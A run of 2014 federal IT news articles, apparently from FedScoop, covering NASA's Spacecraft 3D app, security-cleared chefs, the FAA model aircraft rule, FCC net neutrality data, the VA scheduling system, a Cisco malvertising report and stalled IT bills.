NASA rolls out big app upgrade as Mars rover mission turns 2
NASA rolled out a big app upgrade to commemorate the second anniversary of the Mars Curiosity’s landing on Mars. (Graphic Courtesy of NASA)As a celebration of the two-year anniversary of the Mars Curiosity Rover landing, NASA released an update to its 3-D Spacecraft app that features a bunch of new content from the rover’s explorations.
The augmented reality app now offers four new 3-D models of NASA spacecraft that users can interact with and a new image book published by National Geographic.
Before the update, users needed to use an augmented reality target to interact with the models, according to NASA:
“Augmented reality overlays visual content, like 3-D spacecraft models, onto the real-world view from a device’s camera. To view the app’s content, users can print a special target image on a standard sheet of paper. When the device’s camera is pointed at the target, the spacecraft chosen by the user appears onscreen as if it were in the scene.”
Now users can interact with the models in “manual mode,” allowing them to explore them without the need for a target.
The book packaged with the update, titled “Mars Up Close: Inside the Curiosity Mission,” includes photos from Mars Odyssey, Mars Reconnaissance Orbiter, Curiosity, Curiosity’s Descent Stage and the Mars Atmosphere and Volatile Evolution mission.
“Spacecraft 3D makes it so easy for anyone to experience the magic of these spacecraft and the excitement of space exploration,” said Tom Soderstrom, chief technology officer at NASA’s Jet Propulsion Laboratory, where the app was developed. “We think the app will enhance the experience of learning about these missions, for all ages, for years to come.”
As the second anniversary passed on Aug. 5, NASA chronicled the work the Curiosity Rover has completed and what scientists have been doing in the past few weeks:
“Another recent challenge appeared last week in the form of unexpected behavior by an onboard computer currently serving as backup. Curiosity carries duplicate main computers. It has been operating on its B-side computer since a problem with the A-side computer prompted the team to command a side swap in February 2013. Work in subsequent weeks of 2013 restored availability of the A-side as a backup in case of B-side trouble. In July, fresh commanding of the rover was suspended for two days while engineers confirmed that the A-side computer remains reliable as a backup.”
The Spacecraft 3D app is available on both iOS and Android platforms. You can see all of NASA’s app offerings here.
Feeding the government’s hunger for security clearances — literally
It’s no secret the federal government has a voracious appetite for security clearances. But what many probably don’t know is that even if your dream is to prepare and serve lunch to those hard-working analysts at the CIA, NSA or Defense Intelligence Agency, you’re still going to have to pack a top-secret security clearance with cleared access to sensitive compartmented information.
In this recent job ad posted by Sodexo, the food services company is looking for an executive chef with a top-secret security clearance.A recent job posting by international food services company Sodexo, based in Gaithersburg, Maryland, said the company’s Government Services Division is looking for an executive chef to “manage all the culinary operations at a high profile government dining account in Northern Virginia.” The right candidate needs to have a “passion for quality food, taste, presentation, menu development” and at least 10 years of experience in an executive chef role. Oh, and he or she will also need a government-issued top-secret security clearance.
Steven Aftergood, the director of the Project on Government Secrecy at the Federation of American Scientists, told FedScoop it is not particularly surprising to see this company — which manages food service at CIA headquarters in Langley, Virginia — require such high level security clearances for those working on contracts with U.S. intelligence agencies. In this particular case, the employees may very well be working in an under cover status. “So their names, their faces and simply their presence at the facility could be considered secret, even if they do not communicate any classified information,” Aftergood said.
But in a July 16 blog posting, Aftergood said the example sheds light on a very significant policy problem, namely the government’s use of the security clearance process as an employee screening tool. “This use of the national security clearance process has contributed to the skyrocketing growth in security-cleared personnel,” Aftergood wrote.
As of October 2013, the number of people eligible for access to classified information had ballooned to 5.1 million, including more than 1.5 million with top-secret clearances. According to an Office of the Director of National Intelligence report, only 60 percent of those people had access to classified information, suggesting that vastly more clearances are being requested and granted than are actually required, Aftergood wrote.
In a February report to the president on the current status of the government security clearance process, the Office of Management and Budget warned the growth in the number of security clearance investigations has not only outstripped the government’s ability to keep up but has also cost taxpayers billions of dollars and may, in the end, be putting classified information at greater risk of being exposed.
“[The] growth in the number of clearance-holders increases costs and exposes classified national security information, often at very sensitive levels, to an increasingly large population,” the OMB report states.
“A larger number of clearances is harder to manage and maintain, and more prone to human error, than a smaller, more streamlined cleared population,” Aftergood said. “It’s also more expensive. So yes, non-essential clearances should be avoided in the interest of preserving the integrity and efficacy of the personnel security system.”
Source: Office of Management and BudgetFAA rule for model aircraft too narrow, commenters say
As the Federal Aviation Administration prepares to issue guidelines for how it will handle unmanned aircraft systems, the agency is tightening what constitutes a model aircraft so there’s no confusion between the two.
According to an interpretation of the special rule for model aircraft posted by the FAA on Regulations.gov, a model aircraft must be flown as a hobby, not weigh more than 55 pounds, not interfere with manned aircraft, not fly within five miles of an airport without prior permission and adhere to a set of community-based guidelines.
In the interpretation, the FAA included this chart classifying the difference between recreational and commercial use of model aircraft.(Credit: FAA Interpretation of the Special Rule for Model Aircraft)
The special ruling for model aircraft comes from section 336 of the FAA Modernization and Reform Act of 2012, which defined them as any unmanned aircraft that fly within the line of sight of the person operating them for hobby or recreational purposes.
Under the act, if an aircraft meets the criteria of a model aircraft, it is not subject to further FAA ruling. In the new interpretation, the agency said if a remote controlled craft does not meet the requirements, it will be classified as an unmanned aircraft and must adhere to any future regulations.
So far, the posting on Regulations.gov has warranted more than 29,000 comments from individuals, anonymous users, think-tanks, organizations and academies.
The Information Technology and Innovation Foundation said in its comment the interpretation of the rule for model aircraft is too narrow and could place unnecessary burdens on recreational model aircraft users.
Specifically, the foundation cites the prohibition on the use of first person view goggles by the FAA because the technology would impede the operators direct line of sight, one of the main classifications for model aircraft.
Instead of issuing blanket interpretations, like prohibiting the use of the goggles for model aircraft, Alan McQuinn, a research assistant for ITIF and co-author of the foundation’s comments to the FAA, told FedScoop the agency should look at new technologies on a case-by-case basis.
“We recommend that the FAA not create rules to stop technologies but address them as each of them come into light, because a lot of this technology is still growing,” McQuinn said. “We recommend that the FAA work with community-based standards that already exist around these technologies and are evolving around these technologies to create a ruling for each of them.”
ITIF also encouraged the agency to use another approach to help distinguish between commercial and noncommercial UAS and establish rules to qualify each before issuing guidance on drones in 2015.
“The distinction is tenuous because if they’re regulating for safety, a drone right now being flown by someone who is just a model aircraft enthusiast who takes it up 300 feet and takes a picture of his house, that’s totally legal,” McQuinn said. “But if he takes that picture and sells it, that’s a $10,000 fine. That is a little ridiculous. So if they’re using those standards going forward, we will continue to file comments and advocate for looking at drones in a commercial light that gives them the ability to innovate within the spectrum.”
The Academy of Model Aeronautics also found some areas of the FAA’s interpretation objectionable and said the language of the law — which refers to community-based guidelines, some of which were created by the AMA —required no interpretation.
“The interpretive rule specifically addresses model aircraft operated within the safety programming of a nationwide community-based organization, AMA,” the academy said in its comments. “[The FAA] effectively establishes new rules to which model aircraft were not previously subjected.”
AMA also requested the FAA extend the comment period on the Regulations.gov posting from July 25 until Sept. 23. The FAA granted that request.
The agency’s model aircraft interpretation comes as it plans to release guidelines for the use of unmanned aircraft systems, commonly referred to as drones, in the coming months. The agency’s inspector general reported last month, however, that the guidelines could be delayed.
There have also been reports of an executive order in the works from President Barack Obama that would create a set of privacy guidelines for commercially operated drones.
According to a source familiar with the potential executive order, the White House National Security Council organized an intergovernmental working group last year to examine the issue. The group then tasked the National Telecommunications and Information Administration with developing and enforcing a set of privacy guidelines.
NSC spokesperson Ned Price told FedScoop via email the White House had no comment on any potential executive order but that an interagency review of the issue was underway.
During a July 24 press gaggle in Los Angeles, deputy White House press secretary Eric Schultz would not comment on the specifics of an executive order regulating privacy for commercial drones.
“What we have said on this issue in the past is that the interagency continues to develop and review policies concerning the domestic use of unmanned aircraft systems, and that remains the case,” Schultz said.
FCC opens entire set of net neutrality comments to public
The Federal Communications Commission released files Tuesday containing the full library of more than 1.1 million public comments directed at the commission’s Open Internet plan.
Six XML files were released on the commission’s Electronic Comment Filing System (ECFS), totaling 1.4 GB in size. 
“The release of the comments as open data in this machine-readable format will allow researchers, journalists and others to analyze and create visualizations of the data so that the public and the FCC can discuss and learn from the comments we’ve received,” wrote Gigi B. Sohn, special council of external affairs for the FCC in a blog entry. “Our hope is that these analyses will contribute to an even more informed and useful reply comment period, which ends on Sept. 10.”
Comments that were mailed to the FCC prior to July 18 are still being uploaded to the system and may not be included in the first wave of files. Sohn says they will be included as they are scanned into the system.
“To be clear, every comment will be reviewed as part of the official record of this proceeding,” Sohn wrote.
The XML files give the public a different means of searching through the comments on the ECFS website. That system came under scrutiny after “Last Week Tonight” host John Oliver called on the public to weigh in on the net neutrality debate, which crashed the ECFS system.
We’ve been experiencing technical difficulties with our comment system due to heavy traffic. We’re working to resolve these issues quickly.
— The FCC (@FCC) June 2, 2014
We’re still experiencing technical difficulties with our comment system. Thanks for your patience as we work to resolve the issues.
— The FCC (@FCC) June 2, 2014
Sohn hopes the data continues to spur the already-rigorous debate up until the comment period closes.
“We’re hoping that those who do have the technical know-how will develop and share these tools for the public to use,” Sohn wrote “Open data is an important step towards greater transparency in public deliberations. We look forward to seeing and benefitting from the fruits of your efforts and welcome your ideas on how to make this data even more useful.”
Energy Department rolls out free public access to department-funded research
The landing page of the Energy Department’s Public Access Gateway for Energy and Science. (Courtesy Dept. of Energy)
The Energy Department has launched a portal that will give the public access to scientific journals and peer-reviewed manuscripts tied to the department’s research.
The Public Access Gateway for Energy and Science (PAGES) portal debuted with “thousands of articles from multiple publishers,” according to its landing page, and plans to add 20,000-30,000 articles per year. PAGES, developed by the Energy Department’s Office of Science and Technical Information, is an effort by the department to meet a White House directive to open access to federally-funded scientific research.
“Increasing access to the results of research funded by the Department of Energy will enable researchers and entrepreneurs to capitalize on our substantial research and development investments,” said Secretary of Energy Ernest Moniz in a release. “These new policies set the stage for increased innovation, commercial opportunities, and accelerated scientific breakthroughs.”
Publishers looking to get their work on PAGES can submit items through the Clearinghouse for the Open Research of the United States, which has partnered with DOE to populate PAGES rather than having separate feeds from individual publishers.
Journals that have material on PAGES as of the launch include the American Academy of Arts and Sciences, the American Chemical Society, the American Society of Mechanical Engineers and Oxford University Press, among others.
Currently, the articles in the PAGES system are for “demonstration purposes” as the portal goes through a beta period. As of Oct. 1, 2014, any publication published from a DOE National Laboratory will be expected to submit “manuscript metadata and links,” with full-text access given within a 12-month window.
PAGES mirrors a similar service available from the National Institutes of Health — PubMed Central — that serves as a digital archive of biomedical and life sciences research. PubMed Central offers an archive of 3.1 million articles open to the public.
An international alliance of academic and research libraries said while the PAGES launch is a step in the right direction in regards to the White House’s plan, there are “clearly mixed results” with the Energy department’s offering. The Scholarly Publishing and Academic Resources Coalition (SPARC) said PAGES blurs the line between open access and journals’ copyright.
“The DOE plan does not adequately address the reuse rights that are necessary for the public to do more than simply access and read individual articles,” Heather Joseph, executive director of SPARC, said in a release. “Without clearly articulating these reuse rights, the public’s ability to download, analyze, text mine, data mine and perform computational analysis on these articles is severely limited, and a crucial principle of the White House Directive cannot be fully realized.”
The Energy Department made clear in a statement to FedScoop that it draws a line between “public access” and “public domain.”
“Being publicly accessible does not mean that publications are in the public domain. Publishers maintain their rights under copyright to their Version of Record and publishers partnering with DOE on public access make their content publicly available voluntarily,” said Brian Hitson, director of the Energy Department’s Office of Science and Technical Information. “Although accepted manuscripts or articles will be accessible to the public, copyrights are still retained, and subsequent re-use must be in accordance with applicable copyright restrictions and copyright law. Any other use must be by permission of the copyright owner.”
While PAGES may present hurdles for those looking to mine data, DOE is requiring research funding proposals to be submitted with a data management plan as of Oct. 1. The plan must detail how much data the project will generate and how that data will be shared or preserved.
You can access PAGES here.
USASpending.gov awards don’t match real agency expenses
USASpending.gov has made a solid effort to increase transparency in how the federal government handles taxpayer money each year, but when comparing the data on the website to agency records, the Government Accountability Office found it’s riddled with inconsistencies.
Congress decided in 2006 that taxpayers deserve to know how the federal government spends trillions of dollars each year in contracts and awards, so it enacted the Federal Funding Accountability and Transparency Act and required the Office of Management and Budget to establish a public website to highlight federal awards. Of 37 agencies with a budget authority of more than $400 million, GAO found that 33 had managed to report at least one contract for fiscal year 2012 on USASpending.gov, while the other four claimed exemptions.
However, not much of what was on the website was consistent with actual record, according to the GAO study. “GAO estimates with 95 percent confidence that between 2 percent and 7 percent of the awards contained information that was fully consistent with agencies’ records for all 21 data elements examined,” the report said. “The element that identifies the name of the award recipient was the most consistent, while the elements that describe the award’s place of performance were generally the most inconsistent.”
Additionally, most agencies failed to immediately report information on assistance awards, which totaled hundreds of billions of dollars. “We found that agencies generally reported information on contracts but did not report timely assistance information, leading to underreporting of nearly $619 billion for awards made in fiscal year 2012,” GAO said. “Many of those awards were subsequently reported by agencies.”
As time went on, agencies subsequently reported more and more of the either unreported or improperly reported awards, a total which bloomed from $2.6 trillion in February 2013 to $3.2 trillion by April 2014. Agencies cited many excuses for not reporting awards on USASpending.gov properly, including technical issues, aggregation of awards, unclear understanding of reporting requirements and lack of internal oversight.
This isn’t the first problem GAO has identified regarding USASpending.gov data. In March 2010, GAO found OMB’s compliance with FFATA to be lacking in some areas, such as the requirement to report about the website to Congress. A sample of 100 awards audited all had at least one data error, and reports on programs at nine agencies for fiscal year 2008 were missing. And again in July 2012 and September 2013, GAO reported similar inadequacies.
OMB placed the responsibility in the hands of the agencies to make sure what they were uploading to USASpending.gov was fully and accurately reported. After this audit, GAO said “this approach has had limited effect on the overall quality of the data on the website, reinforcing the need for a more comprehensive oversight process by OMB and more specific guidance from OMB on how agencies are to validate information reported to USASpending.gov. Until these weaknesses are addressed, any effort to use the data will be hampered by uncertainties about accuracy.”
GAO recommended that OMB implement governmentwide oversight to “regularly assess the consistency of information reported by federal agencies to the website other than the award amount.”
VA poised to kick-off contract for new scheduling system
The Department of Veterans Affairs has completed a series of one-on-one meetings with companies interested in taking on what is perhaps the biggest, most complex and important government IT challenge since the rollout of healthcare.gov — replacing VA’s antiquated patient scheduling system with commercial technologies that will enable veterans to see doctors and receive treatment when and where they need it.
The department is scheduled this month to release a request for proposals for its Medical Appointment Scheduling System, which will replace the patient scheduling module within the Veterans Integrated System Technology Architecture, VA’s main electronic health record system known as VistA. The scheduling system has been at the heart of the scandal involving veterans who died waiting for care after being placed on so-called secret wait lists. But VA officials recently outlined an aggressive plan to completely overhaul VistA scheduling along with the cultural and business process challenges that have contributed to VA’s problems.
“We need to solve scheduling because this is our core mission,” said Mike Davies, director of the Access Clinic Administration Program at the Veterans Health Administration, speaking June 18 at a MASS industry day hosted by VA. “We want to make appointments just in time [and] we want truth in scheduling.”
A VA spokesperson told FedScoop the agency is still finalizing the acquisition process and the timeline for the contract.
VistA’s scheduling module plays a much more fundamental role in the larger cycle of patient care and VA operations than previously disclosed. VistA scheduling not only gets veterans appointments, but the data generated by the scheduling system is critical to the long-term management of VA’s medical practices and finances. Everything from health trends in specific populations of veterans to the amount of federal reimbursements provided to individual VA clinics is tied to the VistA scheduling system. Adding to the importance of a robust scheduling module are VA’s plans for telehealth, an army of home care providers that is offline in remote locations for extended periods of time and the agency’s plans for mobile and Web-based self-service applications.
“There are three things we have to measure: We have to know patient demand — how many appointments are made or created in a given timeframe; we have to know supply — how many appointment slots are available to meet that demand; and we have to know activity — how many of those appointments are actually completed,” Davies said. In addition, VA needs to know the cancel rate (which currently stands at a whopping 13 percent and is attributed largely to problems with VistA), the reschedule rate, the cancel and reschedule rate (those who cancel and never reschedule their appointments), the no-show rate and the revisit interval.
A slide from a June 18, 2014, presentation on VA’s planned acquisition of a commercial scheduling system.“The scheduling system needs to support these care coordination agreements between practices,” Davies said. And right now, VistA scheduling is having a difficult time simply matching appointment requests to available medical resources.
VistA is 30 years old; its scheduling component dates back to 1984. And while it has undergone many upgrades and changes, VistA remains an outdated system incapable of keeping up with the massive increase in patient demand that has resulted from the wars in Iraq and Afghanistan as well as an aging veteran population. The number of veterans enrolled in the VA health care system has increased from 5.1 million in 2001 to more than 9 million in 2013. The VA employs 50,000 schedulers who make 113 million appointments per year covering 154 medical centers and more than 700 community-based outpatient centers. But the inability of VistA to provide a single, enterprisewide view of scheduling means these tens of thousands of entry-level workers must deal with multiple appointment types that cut across medical disciplines, are only accessible through different screens on their system and must accurately match patient requests to one of VA’s 125,000 physicians.
“The core problem we’re trying to solve is that we do not know what our provider supply is,” Davies said. Because of VistA, VA is one of the only medical organizations of its size that currently cannot determine how many appointment slots those doctors are staffing, he said.
VistA’s poster child
According to Davies, VA’s mental health practice is the “poster child” for the problems created by VistA scheduling.
“If I’m a psychiatrist, the way the VistA scheduling system is designed is I will have actually on average seven different clinics or profiles or grids. So I have one grid for military sexual trauma, one grid for addictions, one grid for general mental health and on and on. These grids are the way VistA scheduling collects data that often ends up getting reported to Congress,” Davies said. And while counting schedule types is important, VA’s schedulers “must have multiple screens open to check and make appointments in specific grids,” he said. The proliferation of scheduling grids, each only accessible through a separate screen, makes errors and even deliberate gaming of the scheduling system easy.
“It’s a nightmare,” Davies said. “It’s a Gordian knot really, and it’s highly error-prone. This system is really great at collecting data, but it is not really great at matching a need, demand or a request to a resource.”
Making progress
VA plans to acquire its new commercial off-the-shelf (COTS) scheduling module in three phases. The first phase, known as version 1a, will provide immediate, short-term improvements to local scheduling. By Oct. 1, the agency plans to replace VistA’s current graphical user interface — described by Davies and other VA officials as a “roll-and-scroll” interface — with a calendar-based view that pulls everything together in one screen view. But it still won’t pull all of the profiles together just yet. “At least we’ll have one,” Davies said.
Another contract on the horizon “will deliver a better resource management dashboard, an aggregated view of clinical schedules and a single queue of request lists so the scheduler can see the near list, the recall list and the [electronic waiting list] all in one place,” Davies said. That effort is designed to “eliminate any hint of a secret waiting list out there and make sure that the pathway between requests and the scheduler’s desk is absolutely clear, transparent and error-proof,” he said.
The first phase will also include connecting VistA scheduling to a recently developed clinical video teleconferencing capability.
Gary Monger, a product engineer in the Architecture Strategy and Design Group within VA’s Office of Information and Technology, said there are a lot of integration points between VistA scheduling and other legacy VistA applications that will be handled through federated VistA scheduling adaptors that the vendor who wins the contract must develop. “There’s significant risk, cost and time associated with migrating those integration points to a new COTS scheduling application,” Monger said. “So the initial approach is to push that appointment data into the legacy VistA scheduling application.”
The second phase, known as version 1b, calls for COTS implementation within VistA. This phase will give VA time to standardize and modify non-scheduling business practices to account for the new technologies.
The final phase, known as version 2, will begin the full-scale switch to a COTS-based replacement of VistA scheduling capabilities. There is no word on the exact timing of these phases, but officials said it will take several years before all VistA applications can be integrated with the new scheduling module.
Davies said VA has also developed a mobile app that will allow patients to request an appointment, and one is currently in development that will allow patients to schedule an appointment. He described the efforts as an attempt to make forward movement while the new system is being designed.
“What we’re really looking for is the ability regardless of how the veteran comes to us, whether they’re working on a mobile app or they’re coming through a portal or their own phone, that they get the same experience,” Monger said.
“Failure is not an option,” Gerry Lowe, director of Veteran Facing Applications, said. But success won’t be easy either. “For the vendor who’s lucky enough to actually get this award, you’ll be writing your own ticket in the annals of VA. If you’re successful…you’re going to get a hell of a past performance [evaluation].”
Infor partners with Northrop Grumman to expand federal profile
Enterprise software company Infor announced a partnership Tuesday with Northrop Grumman aimed at boosting its federal sector offerings.
Northrop Grumman will help New York-based Infor implement a suite of applications — human resource management, financial management and continuous monitoring — specifically suited for the federal government.
“Infor understands that the federal government’s responsibilities do not begin and end in a standard 8-5 work day,” said Wayne Bobby, Infor’s vice president of federal government solutions, in a release. “By partnering with other leaders in the federal space, such as Northrop Grumman, we are equipping organizations with the tools they need to keep daily processes running efficiently 24 hours a day, seven days a week.”
Infor announced earlier this year it was expanding its efforts into the public sector, hiring Bobby, the one-time Oracle executive and head of federal management services for the State Department.
Jun Choi, director of enterprise business solutions at Northrop Grumman, said the partnership with Infor will allow agencies to operate “faster and smarter.”
“By partnering with Infor, we can offer these organizations access to leading applications…that will allow them to spend less time focusing on internal operations and more time prioritizing service to citizens,” Choi said.
Financial terms of the partnership were not disclosed.
Why your agency needs to worry about ‘malvertising’
‘Malvertising’ takes a little snippet of JavaScript and loads an exploit kit to your local machine. (Credit: iStock)
Any federal workers taking breaks from their jobs to visit mainstream news websites may be susceptible to exploitation kits just by loading the page, according to a new report from Cisco Systems.
The company released its 2014 Midyear Security Report Tuesday, which focuses on a number of low-key, low-risk vulnerabilities that hackers are using to exploit systems and access data.
Levi Gundert, the technical lead for Cisco’s threat research, analysis and communications team, said cybercriminals are purchasing last-minute ad packages in the hopes that their kits — which may only show up every 100 or 1,000 ad impressions — make it through the exchange’s security measures.
Malvertising then takes it one step further: Even hackers know clickthrough rates for online display ads are infinitesimal, so the exploit kits do not require the user to actually click on an ad.
“You load the page, the ad is loaded with it and you are instantly redirected because it contains either an iFrame or some JavaScript that says ‘redirect browser,’ and that address is an exploit kit landing page,” Gundert said. “It’s completely transparent to the user. If they haven’t patched their applications, if they haven’t patched Windows, haven’t patched their browser, they’re instantly exploited.”
The malvertising also takes advantage of Internet users’ unfamiliarity with the maze of ad networks that mainstream sites partner with, making it virtually undetectable to the average user’s eye.
“Folks don’t understand the risk, they don’t understand how it works,” Gundert said. “They don’t understand that when you go to CNN.com, they have hundreds of external relationships with parties off the site — content delivery networks, advertising exchanges — that’s the primary mechanism that’s feeding the redirection.”
While Gundert said he has had conversations with leading ad networks to solve the problem, it is crucial that agency chief information security officers and chief information officers take the time to plan for these exploits as workplace culture continues to change.
“So much [security] effort has been put on the perimeter,” he said. “There is no perimeter any more. We all work remotely, we all work on the go, we all work on the road and there are restrictions in government, but they are going to fade over time.”
WordPress problems?
The reports also highlights a number of rising vulnerabilities, including exploit kits being used on popular content management systems like WordPress. Hackers are becoming particularly adept at cracking sites no longer used in order to have them “upload malicious binaries and use them as exploit delivery sites.”
“There are millions of installations and instances of CMS software and people don’t care about security, they just want to run the site,” Gundert said. “There are fundamental vulnerabilities in older versions, there are vulnerabilities in the third-party add-ons that [hackers] are exploiting.”
Java still hot — for hackers
Java exploits represented 93 percent of all incidents of compromise measured by the company, a 2 percent increase since Cisco’s last report.
“Java’s extensive attack surface and high return on investment are what make it a favorite for adversaries to exploit,” reads the report, which also sais Microsoft Silverlight is a key target for Java exploits.
Can CISOs ever sleep?
The 50-page report, which covers a number of other vulnerabilities, is enough to give any seasoned cybersecurity official a reason to sweat. However, Gundert said the best way to defend against attacks is to expect them, no matter how prepared an agency may be.
“You can absolutely think about threats, you can inspect threats, you can expect that you are going to be compromised and really shorten that detection window,” Gundert said. “I think that’s where people need to focus. As a CISO, you sleep better at night knowing ‘Yes, this is a real attack, this is probably going to happen to us, but we have a very smart team in place and we are going to detect it and its going to be a really short remediation window.'”
You can read Cisco’s full report here.
5 IT legislative initiatives that went nowhere before recess
Congress started a five-week recess Aug. 1 and left several IT bills on the table. Here are the five major IT initiatives lawmakers failed to act upon before skipping town.
The Federal Information Technology Acquisition and Reform Act
Status: Passed House, Passed Senate Committee, Awaiting Action on Senate Floor
The first rumblings of what became FITARA appeared in a report released by the Government Accountability Office in February 2012 that identified a potential $1.2 billion federal dollars spent on duplicative IT programs. In response, House Oversight Chairman Rep. Darrell Issa, R-Calif., circulated a draft bill of FITARA.
Before the bill was formally introduced, Rep. Gerry Connolly, D-Va., cosponsored it. Since its introduction, the bill has passed the House three times, but in slightly different forms.
Most recently, the second version of the bill moved on to the Senate, where it passed the Homeland Security and Governmental Affairs Committee.
The bill, if passed, would consolidate the position of CIO across federal agencies, allowing one person to hold the title per agency. In addition, the bill gives more power to the individual with that power.
Permanent Internet Tax Freedom Act
Status: Passed House, Awaiting Referral in Senate
Passed originally in 1998, the Internet Tax Freedom Act barred any tax on Internet services except if a state already had one at the time of the act’s signing. Since its passage, the act was renewed three times. The current renewal is set to expire on November 1, 2014.
The November 1 deadline is particularly pressing given that Congress will return to session on September 8, allowing less than two months for the original act to either be extended or for the permanent moratorium to be passed.
Differing from the 1998 bill, PITFA would revoke the state-based Internet access taxes in seven states that had them in place before the original ITFA passed. The bill passed through committee in June and then the full House a few weeks later.
The Federal Information Security Modernization Act of 2014
Status: Passed Senate Committee, Awaiting action on Senate Floor
Enacted in 2002, the original Federal Information Security Modernization Act required agencies to create a set of standards to handle information security. The act required a set of qualifications that the standards must meet.
In the 2014 update, the original bill is not rewritten, but some reporting requirements are removed from the original plan. In addition, some requirements about how OMB governs the bill will be adjusted.
The bill passed the Senate Homeland Security and Governmental Affairs Committee, and a similar version of the bill passed the House a year prior.
Various cybersecurity bills
Status: Miscellaneous
A number of cybersecurity bills were also left without much action before recess. The National Cybersecurity and Critical Infrastructure Protection Act of 2014, which codifies cybersecurity regulations, primarily in the Department of Homeland Security, passed the House last week and has been referred to committee in the Senate.
Also dealing with DHS, the Cybersecurity Boots on the Ground Act also passed the House last week and was also referred to committee in the Senate.
In addition to the 2014 cybersecurity bills in progress, several bills remain leftover from the 2013 legislative calendar, some of which were introduced in the 112th Congress. A few other bills, including one introduced by Sen. Kirsten Gillibrand, D-N.Y., made appearances last week before Congress left town.
USA FREEDOM Act
Status: Passed House, Referred to Senate Committee
In the wake of Edward Snowden’s revelations about the National Security Agency, members of both houses of Congress spoke about legislation necessary to address the agency’s activities.
The USA FREEDOM Act was introduced in both houses in late 2013 and was designed to end the bulk data collection on Americans. Since its introduction, it has passed the House and been referred to the Senate Judiciary Committee.
The bill, after being amended in May 2014, would also extend the controversial Patriot Act and amend it to ensure any data collected from citizens is absolutely essential.